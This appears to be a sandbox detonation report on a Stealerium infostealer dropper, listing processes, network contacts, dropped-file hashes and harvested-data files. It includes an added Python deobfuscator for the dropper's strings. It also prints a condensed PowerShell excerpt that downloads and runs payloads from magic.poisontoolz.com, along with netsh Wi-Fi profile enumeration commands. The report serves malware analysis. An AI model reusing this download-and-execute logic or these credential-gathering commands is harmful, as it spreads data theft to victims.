"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A4AFFB00DA70C44E89F0006F7A791B52 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0DAD23F905662147322197BCAE29E9B2 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0DAD23F905662147322197BCAE29E9B2 --renderer-client-id=4 
--mojo-platform-channel-handle=2160 --allow-no-sandbox-job /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8F6D819C2C95458AFCD482D7629D9A50 --mojo-platform-channel-handle=2560 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=9B94B64419BE447393C0FAA7D9D790F7 --mojo-platform-channel-handle=2844 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4F5F8B806EAD2D2C82F04826F782E692 --mojo-platform-channel-handle=2928 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
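
The powershell.exe command line in this process list hides every string behind sqawNbuSbNoQJZv, which subtracts the constant $qiARGdapNw = 58276 from each element of an @(...) integer array and casts the result to [char]. The decoder below is an added example written for this report, not code from the page or from the sample: it reproduces that transform in Python, pulls every array literal out of the script, rewrites the script with the plaintext in place, and derives the key from a plaintext guess for the case where a variant changes the constant. The SAMPLE excerpt is constructed: its arrays are copied from the recorded command line, the surrounding PowerShell is condensed. Decoding yields the two payload URLs (https://magic.poisontoolz.com/Document.pdf and https://magic.poisontoolz.com/Buildcrypt.exe), the Net.WebClient type name used for the download, and the .dll/.ps1/.msi dispatch suffixes. The .msi branch calls misexec, a misspelling of msiexec, so that branch would fail on a stock Windows install.

```python
"""Decoder for the integer-array string obfuscation used by the PowerShell
dropper recorded in this run. Added example, not code from the page or the
sample: sqawNbuSbNoQJZv rebuilds each string as [char](n - 58276) for every n
in an @(...) array; the functions below reverse that."""
import re

KEY = 58276  # value of $qiARGdapNw in the recorded command line

# Matches a PowerShell integer-array literal such as @(58322,58376,58384,58384)
ARRAY_RE = re.compile(r"@\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)")


def decode_array(values, key=KEY):
    """Apply the dropper's transform in reverse: chr(n - key) per element."""
    return "".join(chr(n - key) for n in values)


def _parse(literal_body):
    """'58322,58376' -> [58322, 58376]."""
    return [int(x) for x in literal_body.split(",")]


def extract_strings(script, key=KEY):
    """All decoded strings, in the order their array literals appear."""
    return [decode_array(_parse(m.group(1)), key) for m in ARRAY_RE.finditer(script)]


def deobfuscate(script, key=KEY):
    """Rewrite the script with each @(...) literal replaced by a quoted plaintext."""
    return ARRAY_RE.sub(lambda m: "'" + decode_array(_parse(m.group(1)), key) + "'", script)


def recover_key(values, known_prefix):
    """Derive the additive key from a plaintext guess for the leading characters
    (a download URL must start with 'https://'); every position must agree."""
    candidates = {n - ord(c) for n, c in zip(values, known_prefix)}
    if len(candidates) != 1:
        raise ValueError("prefix does not fit a single additive key")
    return candidates.pop()


def urls(script, key=KEY):
    """Decoded strings that look like download URLs (the payload hosts)."""
    return [s for s in extract_strings(script, key)
            if s.lower().startswith(("http://", "https://"))]


# Constructed excerpt: arrays copied from the recorded command line, the
# surrounding PowerShell condensed. 'misexec' is the sample's own typo.
SAMPLE = (
    "if($p.EndsWith((sqawNbuSbNoQJZv @(58322,58376,58384,58384)))){rundll32.exe $p}"
    "elseif($p.EndsWith((sqawNbuSbNoQJZv @(58322,58388,58391,58325)))){powershell.exe -File $p}"
    "elseif($p.EndsWith((sqawNbuSbNoQJZv @(58322,58385,58391,58381)))){misexec /qn /i $p};"
    "$c = New-Object (sqawNbuSbNoQJZv @(58354,58377,58392,58322,58363,58377,58374,58343,58384,58381,58377,58386,58392));"
    "$pdf = $c.DownloadData((sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58344,58387,58375,58393,58385,58377,58386,58392,58322,58388,58376,58378)));"
    "$exe = $c.DownloadData((sqawNbuSbNoQJZv @(58380,58392,58392,58388,58391,58334,58323,58323,58385,58373,58379,58381,58375,58322,58388,58387,58381,58391,58387,58386,58392,58387,58387,58384,58398,58322,58375,58387,58385,58323,58342,58393,58381,58384,58376,58375,58390,58397,58388,58392,58322,58377,58396,58377)));"
)

if __name__ == "__main__":
    for s in extract_strings(SAMPLE):
        print(repr(s))
    print(deobfuscate(SAMPLE))
```

Feed the full recorded command line to deobfuscate() to read the dropper in the clear; use recover_key() on the first array of a new sample with the guess "https://" when the constant has been changed, then pass the result as key to the other functions.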

Network

Country Destination Domain Proto
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 magic.poisontoolz.com udp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 104.21.10.90:443 magic.poisontoolz.com tcp
US 8.8.8.8:53 169.0.37.23.in-addr.arpa udp
US 13.85.23.86:443 tcp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 discordapp.com udp
US 162.159.135.233:443 discordapp.com tcp
US 104.18.114.97:80 icanhazip.com tcp
US 162.159.135.233:443 discordapp.com tcp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 12.179.17.96.in-addr.arpa udp
US 152.199.19.74:80 tcp
US 8.8.8.8:53 udp
N/A 51.11.168.232:443 tcp
US 8.8.8.8:53 udp
N/A 51.11.168.232:443 tcp
N/A 51.11.168.232:443 tcp
US 8.8.8.8:53 udp
GB 104.77.160.31:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 13.85.23.86:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 20.242.39.171:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 13.85.23.86:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 104.18.114.97:80 tcp
US 8.8.8.8:53 udp
N/A 51.38.43.18:443 tcp
US 8.8.8.8:53 udp
N/A 31.14.70.246:443 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp

Files

memory/952-0-0x0000000071B40000-0x00000000722F0000-memory.dmp

memory/952-2-0x0000000002800000-0x0000000002836000-memory.dmp

memory/952-1-0x0000000004D30000-0x0000000004D40000-memory.dmp

memory/952-3-0x0000000005370000-0x0000000005998000-memory.dmp

memory/952-4-0x0000000005180000-0x00000000051A2000-memory.dmp

memory/952-6-0x0000000005AC0000-0x0000000005B26000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4somwvmw.4ed.ps1
(probe script that powershell.exe writes at startup to test whether AppLocker/WDAC script enforcement is in effect; a side effect of PowerShell starting, not a dropped payload)

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/952-5-0x0000000005A50000-0x0000000005AB6000-memory.dmp

memory/952-16-0x0000000005C90000-0x0000000005FE4000-memory.dmp

memory/952-17-0x00000000061B0000-0x00000000061CE000-memory.dmp

memory/952-18-0x0000000006200000-0x000000000624C000-memory.dmp

memory/952-19-0x0000000004D30000-0x0000000004D40000-memory.dmp

memory/952-22-0x0000000006740000-0x0000000006762000-memory.dmp

memory/952-21-0x00000000066D0000-0x00000000066EA000-memory.dmp

memory/952-20-0x0000000007390000-0x0000000007426000-memory.dmp

memory/952-23-0x00000000079E0000-0x0000000007F84000-memory.dmp

memory/952-24-0x0000000008610000-0x0000000008C8A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 380888258d0c8d18da63e80591a4e0f3
SHA1 70ef5767c29304806ccc4cd136d9c5bfd8dcf403
SHA256 eaaefbc4c960dca1de30c44f0fccbbefdb9c3e0e243e7ff5579316b99206b8e0
SHA512 63104e4e2e6b260522c26a28287684bb8dab433d4b03396e30b478288980d15d4d259d873f1f59eda364ec777bcdc79f481b11890178a012f2bc483497c4e3b3

memory/1000-40-0x0000000000700000-0x000000000071C000-memory.dmp

memory/1000-41-0x0000000071B40000-0x00000000722F0000-memory.dmp

memory/1000-42-0x0000000005100000-0x0000000005110000-memory.dmp

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe
(captured while still zero-length: the hashes below are those of an empty file, not of the payload)

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 1146d3a15130bd2c5fdfae7ea6cd78a3
SHA1 0a2a1406b135a5f2b7c57aec1c8cdb53c1b6b22f
SHA256 0f5890a4dc9f8f4ae0967c8958cf02f70009dd3748268d33c8acf06226cdba2a
SHA512 dd6cebb5b0bf8e06d32da44fd9d1d12ee7c0e88efd0fe80a62f9cc5bc6c0fc8266f9d1ca9883e1f12039e2587a52f8f679d00d7cb506115204435779d6c7dc96

C:\Users\Admin\AppData\Roaming\Document.pdf

MD5 80a2593453c09724d152e841a3ff0865
SHA1 c73c293d18aac71c530d69ea03314f064f5c6386
SHA256 71d885fd0734c915b43ed11d45750aa67c53a11d6a95c9c8323d9fd6e3b413cd
SHA512 ff131d439c8e06a789fa82ab7d2640ba87ab03b165f6bbf0d8048baad81c797e45c96000312c37dd5d1a53a2996ce7d3b6ccab09470d52840e4e8344f5b04f67

memory/1000-44-0x0000000006A80000-0x0000000006C8A000-memory.dmp

memory/1000-45-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-46-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-48-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-52-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-50-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-54-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-56-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-58-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-62-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-66-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-68-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-70-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-72-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-64-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-74-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-76-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-78-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-80-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-82-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-84-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-86-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-90-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-92-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-94-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-96-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-88-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-60-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-100-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-102-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-98-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-104-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-106-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/1000-108-0x0000000006A80000-0x0000000006C84000-memory.dmp

memory/952-655-0x0000000071B40000-0x00000000722F0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 c26ed30e7d5ab440480838636efc41db
SHA1 c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591
SHA256 6a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef
SHA512 96cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 752a1f26b18748311b691c7d8fc20633
SHA1 c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256 111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512 a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents

MD5 b65b0fffc080d61f81df44a349dcbd5e
SHA1 8540e8fc99e86275493bffb8e0224a29b6f4d6e5
SHA256 6cd8bc3eedeaf4ef2d54af586634e03d8bf7f9a3fdf4256f86a3dd4d006440f7
SHA512 29f48f648ba705f29522d0dab95afe44cccb878610a6ecb45bb7131834a31de97bf8f3683ef8a946389507faa90296c1bd33063dba43fc5e95640c1b8f529bdc

memory/1000-1093-0x00000000028E0000-0x00000000028E1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

MD5 daf72125c1f6c2c88d6a41564d3f025e
SHA1 dbe3ad9f09bdda33f0f318b0d766375baf1fc1f9
SHA256 91241978919b4738d0be1891144d0614903a08b1e1975e425407e4694ca342b2
SHA512 1133b6013f5a4132d21b208b4a8622e1fd0ae409acdf535d24f00e985bc7387b27407f7cd8bd991e33255cc4752794f6015c0580bdd3885e1b1d6af7665a9776

memory/1000-1106-0x0000000005950000-0x0000000005AF2000-memory.dmp

memory/1000-1107-0x0000000005AF0000-0x0000000005B3C000-memory.dmp

memory/4664-1113-0x0000000000400000-0x0000000000592000-memory.dmp

memory/4664-1114-0x0000000071B40000-0x00000000722F0000-memory.dmp

memory/1000-1115-0x0000000071B40000-0x00000000722F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Buildcrypt.exe.log

MD5 c3941d9fa38f1717d5cecd7a2ca71667
SHA1 33b5362675383b58b4166ed9f9a61e5aa6768d2e
SHA256 f1ed6ff1cd3df219061e32df1c75d6f48de6484cf50e5ea7d86cd8bcfcb93256
SHA512 98f103ef97d32bf8c0566a6f6da5cf8d58d18f698c1b3e5bd0be0ea8462f5fe54c2e5e6b5188f2b7d8f70082ffd6745b1f7f6cab95af474e2b7eaed50a9d9c45

C:\Users\Admin\AppData\Roaming\Buildcrypt.exe

MD5 ebaf811ecff8139439cbcad21e0788d5
SHA1 f494b3df2a71e137f86b7e9b6f06f6a659534311
SHA256 3b1dce1a2e8e3753e7a29b43946c83be26ac9d28de854bae2a81e37af5c58349
SHA512 62580c267c09b181f9772d8d132738240022d9abb3c1a89d564c4f0e0d0a2f59161a7527e0d6799cfc1fd5176670d7231d3a7eceb31a4bb3db59f4854efc2219

memory/4664-1121-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1127-0x0000000005180000-0x0000000005188000-memory.dmp

memory/4664-1126-0x00000000059E0000-0x0000000005A06000-memory.dmp

memory/4664-1125-0x0000000005950000-0x00000000059E2000-memory.dmp

memory/4664-1129-0x0000000006830000-0x0000000006838000-memory.dmp

memory/4664-1130-0x0000000006850000-0x000000000686E000-memory.dmp

memory/4664-1128-0x0000000006820000-0x000000000682A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Stealerium-Latest.log

MD5 27fda8b4ccd36e3f67a3567b72d190ff
SHA1 23a3af45be473349ef5425af4523899c50ce76d8
SHA256 a696b5a790f107591693870ea2dcc3ace5f8ab11fa192435e99f1c70a7c4b90a
SHA512 4be81d52a28bf5e7be69dd1db51803288b5817e4e9c56efd1bb78767695f3753e1afa10d3bb29d0d4d684f27c707aa1d53f386d5c04c8b080ffd4d718a7b267e

memory/4664-1187-0x0000000007020000-0x00000000070B2000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Process.txt

MD5 78f78af907cebe8c34bc2b58820ccb8c
SHA1 0a1e64adcc9ccd1b59ab0fec3460fd888ddc8d28
SHA256 3aaa47224ec7e88b7c1c6b9ad9f69ef163b4a3bb432e2d9cad7a490b81f2d22f
SHA512 20cad89ca15bd38ca5d621850e914c784dec50c8fd4bc45ac739da6425d84146935d4f3d9d1649e58bc22dc7a91f98559b8492a2183873bc271dd83e90ae238d

memory/4664-1297-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1296-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1331-0x0000000006930000-0x00000000069AA000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

memory/4664-1404-0x0000000006BB0000-0x0000000006C62000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\Windows.txt

MD5 d3181270194f2c60fb84019a64a67ec0
SHA1 e60cbb8316305efa9717d6c99702560621cd9901
SHA256 08a20a4a7d010e9670afd792ae04a642a7c4b66101bba3111d3f159a220a643d
SHA512 d08944250f7b4e7aaf54f43851596a57da056fa5da3f6c73103d186e7f944ff72cb3a308b76fb38b59376eeebe1838cc7634b3f6f1cdda64fe696dcc07b1f305

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\Startup.txt

MD5 68c93da4981d591704cea7b71cebfb97
SHA1 fd0f8d97463cd33892cc828b4ad04e03fc014fa6
SHA256 889ed51f9c16a4b989bda57957d3e132b1a9c117ee84e208207f2fa208a59483
SHA512 63455c726b55f2d4de87147a75ff04f2daa35278183969ccf185d23707840dd84363bec20d4e8c56252196ce555001ca0e61b3f4887d27577081fdef9e946402

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

memory/4664-1406-0x0000000008120000-0x0000000008474000-memory.dmp

memory/4664-1408-0x0000000071B40000-0x00000000722F0000-memory.dmp

C:\Users\Admin\AppData\Local\b7cef675e8a0c9d712d4cdaf726f00f9\msgid.dat

MD5 83d0759b0e0bd95d8ec3af4b24d34892
SHA1 3ef09021405d57c5c6b6581432064ed6dd055120
SHA256 dc12668b00a4dd01fa9bdc70018d359e4733d3db9cb387bddeb95e44a3f6585c
SHA512 cf525f2798199adf0a67f68bfa36a206978bc26557616d7dc20d5e0c99a3cf422ca1e9db1724b1dcf31a1f1716e9dd273e3427bad04bf6db395f6575fdf6c783

memory/4664-1419-0x00000000072E0000-0x00000000072EA000-memory.dmp

memory/4664-1426-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1433-0x0000000005190000-0x00000000051A0000-memory.dmp

memory/4664-1434-0x0000000005190000-0x00000000051A0000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231215-en

Max time kernel

142s

Max time network

150s

Command Line

